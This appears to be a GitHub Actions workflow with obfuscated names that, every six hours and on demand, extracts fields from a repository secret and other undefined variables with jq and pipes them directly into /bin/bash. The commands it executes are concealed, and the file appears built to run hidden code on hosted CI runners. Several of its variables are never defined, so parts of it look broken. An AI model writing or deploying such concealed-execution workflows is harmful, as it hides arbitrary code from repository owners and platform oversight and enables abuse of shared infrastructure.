name: zhaojinan7890

on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaojinan7890
        env:
          yog5: ${{ secrets.yog5 }}
        run: |
          echo $yog5 | jq -r .hvk9 | /bin/bash
          echo $dq12 | jq -r .ll98 | /bin/bash
          echo $j72109 | jq -r .xrduu61828 | /bin/bash
          echo $kmped270 | jq -r .ty676 | /bin/bash
          echo $f26 | jq -r .lfk23643 | /bin/bash

